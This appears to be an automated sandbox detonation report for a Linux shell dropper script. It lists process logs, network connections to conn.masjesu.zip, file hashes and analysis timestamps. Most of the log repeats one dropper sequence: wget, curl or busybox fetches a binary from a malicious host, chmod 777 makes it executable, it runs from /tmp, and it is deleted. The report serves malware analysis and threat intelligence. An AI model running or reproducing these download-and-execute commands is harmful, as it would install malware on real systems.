[./Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/rm

[rm Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/chmod

[chmod 777 VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh

[./VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/rm

[rm VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/chmod

[chmod 777 tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv

[./tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/rm

[rm tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/chmod

[chmod 777 mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq

[./mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/rm

[rm mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/chmod

[chmod 777 Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z

[./Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/rm

[rm Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/chmod

[chmod 777 H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o

[./H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/rm

[rm H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/chmod

[chmod 777 MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8

[./MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/rm

[rm MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/chmod

[chmod 777 Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq

[./Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/rm

[rm Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/chmod

[chmod 777 dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl

[./dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/rm

[rm dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/chmod

[chmod 777 ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N

[./ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/bin/rm

[rm ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/chmod

[chmod 777 MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J

[./MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/bin/rm

[rm MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/chmod

[chmod 777 ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/tmp/ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX

[./ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/bin/rm

[rm ElSJuxHfA1jBeBrn6kgQwvVjimNZyu8xYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/chmod

[chmod 777 lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/tmp/lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg

[./lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/bin/rm

[rm lB4B5OKiANeDqdZEcNTfmwYIBKOLkuMTDg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/chmod

[chmod 777 dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/tmp/dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww

[./dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/bin/rm

[rm dJIRIS3fIEsIe3gdZ4c8NtuTkyZUZ4RBww]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/chmod

[chmod 777 Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/tmp/Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd

[./Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/bin/rm

[rm Mj4CQad7zY1H1sbSpX7Y5WyRB3PM5DGsAd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/chmod

[chmod 777 VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/tmp/VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh

[./VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/bin/rm

[rm VX9fro4oT4L7IYRexFAdGGO49L2O5hYKGh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/chmod

[chmod 777 tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/tmp/tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv

[./tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/bin/rm

[rm tEWxeFqWYJ5FMR388Hg8Iu6prXLDx0q0wv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/chmod

[chmod 777 Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/tmp/Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq

[./Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/bin/rm

[rm Jp5SOg0AxAyAo9fewo3pjICTViRj1YA9nq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/chmod

[chmod 777 dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/tmp/dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl

[./dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/bin/rm

[rm dHObstG7LU99jTkh5GsOz0rwUn9AAvcPKl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/chmod

[chmod 777 mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/tmp/mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq

[./mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/bin/rm

[rm mUzHIm52QGre6l6z7xbx9FU7x1KDQ0Dfjq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/chmod

[chmod 777 Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/tmp/Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z

[./Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/bin/rm

[rm Em9dlSBHXSJ1BhY8HH74CfelJWsKDX7b1Z]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/chmod

[chmod 777 H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/tmp/H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o

[./H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/bin/rm

[rm H9QVWnuz04G6ntA4l4ZU12dEt8OZPed67o]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/chmod

[chmod 777 MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/tmp/MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8

[./MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

/bin/rm

[rm MSKEgsSBQv7XOhgr3KTn15uFZBTGojSyZ8]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp

Files

/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N

MD5 7689ca8c5bc85cf6b78ef89323d4df6a
SHA1 a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA256 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA512 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-29 02:53

Reported

2024-10-29 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh

[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 195.181.164.17:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A